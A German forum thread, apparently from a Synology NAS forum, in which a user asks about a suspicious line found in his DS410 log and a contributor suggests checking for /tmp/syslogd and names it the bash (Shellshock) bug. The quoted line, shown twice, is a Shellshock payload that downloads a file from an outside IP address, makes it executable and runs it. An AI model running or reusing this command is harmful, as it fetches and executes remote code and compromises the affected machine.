() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /t

Status
Für weitere Antworten geschlossen.

steffen1707

Benutzer
Mitglied seit
13. Nov 2014
Beiträge
1
Punkte für Reaktionen
0
Punkte
0
Hallo,

ich habe folgendes auf meiner DS410 im Log gefunden ....
Ich bin kein Linux Spezialist, aber wget ist mir schon geläufig...

was ist hier passiert ?
Die Sicherheitslücke scheint ja bekannt und mit dem letzten Update behoben zu sein.
Der "Angriff" erfolgte jedoch vor 2 Wochen.. muss ich mir sorgen machen ?

() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;

Vielen Dank schon mal vorab für eure Hilfe !
Steffen
 

dil88

Benutzer
Contributor
Sehr erfahren
Mitglied seit
03. Sep 2012
Beiträge
30.626
Punkte für Reaktionen
2.026
Punkte
829
Schau Dir einmal an, ob es ein /tmp/syslogd bei Dir gibt und vor allem, ob /tmp/syslogd in der Prozessliste auftaucht (nicht der normale syslogd).

Edit: Siehe Beitrag von jahlives, kannst meinen Beitrag ignorieren. Das ist die bash-Geschichte. Da die bash nur auf Atom-Modellen zum DSM gehört, wurde auch nur dort gepatcht.
 
Status
Für weitere Antworten geschlossen.
 

Kaffeautomat

Wenn du das Forum hilfreich findest oder uns unterstützen möchtest, dann gib uns doch einfach einen Kaffee aus.

Als Dankeschön schalten wir deinen Account werbefrei.

:coffee:

Hier gehts zum Kaffeeautomat